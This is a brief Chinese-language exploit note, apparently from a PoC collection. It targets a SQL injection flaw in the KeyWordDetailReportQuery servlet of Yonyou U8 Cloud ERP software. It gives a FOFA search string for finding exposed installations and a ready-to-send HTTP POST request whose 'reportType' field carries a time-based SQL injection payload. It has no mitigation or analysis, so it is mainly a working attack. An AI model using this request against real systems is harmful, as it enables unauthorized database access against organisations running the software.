用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞

fofa

app="用友U8 Cloud"

poc

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery  HTTP/1.1
host:127.0.0.1

{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}